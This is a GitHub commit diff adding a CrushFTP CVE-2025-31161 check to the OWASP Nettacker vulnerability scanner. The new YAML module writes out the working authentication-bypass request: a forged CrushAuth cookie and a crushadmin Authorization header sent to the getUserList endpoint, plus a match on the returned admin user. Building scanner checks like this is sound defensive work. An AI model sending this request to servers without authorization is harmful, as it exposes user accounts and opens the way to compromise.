File tree Expand file tree Collapse file tree 2 files changed +61
-0
lines changed Expand file tree Collapse file tree 2 files changed +61
-0
lines changed Original file line number Diff line number Diff line change @@ -139,6 +139,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
139139*  '** clickjacking_vuln** ' - check the web server for missing 'X-Frame-Options' header (clickjacking protection)
140140*  '** content_security_policy_vuln** ' - check the web server for missing 'Content-Security-Policy' header
141141*  '** content_type_options_vuln** ' - check the web server for missing 'X-Content-Type-Options'=nosniff header
142+ *  '** crushftp_cve_2025_31161_vuln** ' - check the target for CrushFTP CVE-2025  -31161 vulnerability
142143*  '** f5_cve_2020_5902_vuln** ' - check the target for F5 RCE CVE-2020  -5902 vulnerability 
143144*  '** heartbleed_vuln** ' - check SSL for Heartbleed vulnerability (CVE-2014  -0160)
144145*  '** msexchange_cve_2021_26855** ' - check the target for MS Exchange SSRF CVE-2021  -26855 (proxylogon/hafnium)
Original file line number Diff line number Diff line change 1+ info :
2+   name : crushftp_cve_2025_31161_vuln 
3+   author : OWASP Nettacker Team 
4+   severity : 9.8 
5+   description : > 
6+     This module checks for a critical improper authentication vulnerability in CrushFTP 
7+     (CVE-2025-31161). The vulnerability allows unauthenticated users to access sensitive 
8+     files and execute arbitrary commands, leading to potential data exposure and system 
9+     compromise. 
10+ 
11+ reference :
12+     - https://ccb.belgium.be/advisories/warning-critical-improper-authentication-vulnerability-crushftp-patch-immediately 
13+     - https://nvd.nist.gov/vuln/detail/CVE-2025-31161 
14+     - https://www.huntress.com/blog/crushftp-cve-2025-31161-auth-bypass-and-post-exploitation 
15+ 
16+   profiles :
17+     - crushftp 
18+     - vuln 
19+     - vulnerability 
20+     - http 
21+     - high_severity 
22+ 
23+ 
24+ payloads :
25+   - library : http 
26+     steps :
27+       - method : get 
28+         timeout : 3 
29+         headers :
30+           User-Agent : " {user_agent}" 
31+           Cookie : " CrushAuth=1111111111_111111111111111111111111111111111" 
32+           Authorization : " AWS4-HMAC-SHA256 Credential=crushadmin/" 
33+           Connection : " close" 
34+         allow_redirects : false 
35+         ssl : false 
36+         url :
37+           nettacker_fuzzer :
38+             input_format : " {{schema}}://{target}:{{ports}}{{paths}}" 
39+             prefix : " " 
40+             suffix : " " 
41+             interceptors : [] 
42+             data :
43+               paths :
44+                 - " /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111" 
45+               schema :
46+                 - " http" 
47+                 - " https" 
48+               ports :
49+                 - 80 
50+                 - 443 
51+                 - 8080 
52+         response :
53+           condition_type : and 
54+           conditions :
55+             status_code :
56+               regex : ' 200' 
57+               reverse : false 
58+             content :
59+               regex : ' <user_list_subitem>crushadmin</user_list_subitem>' 
60+               reverse : false 
 
 
   
 
     
   
   
          
    
    
     
    
      
     
     
    You can’t perform that action at this time.
  
 
    
  
    
      
        
     
       
      
     
   
 
    
    
  
 
  
 
     
    
0 commit comments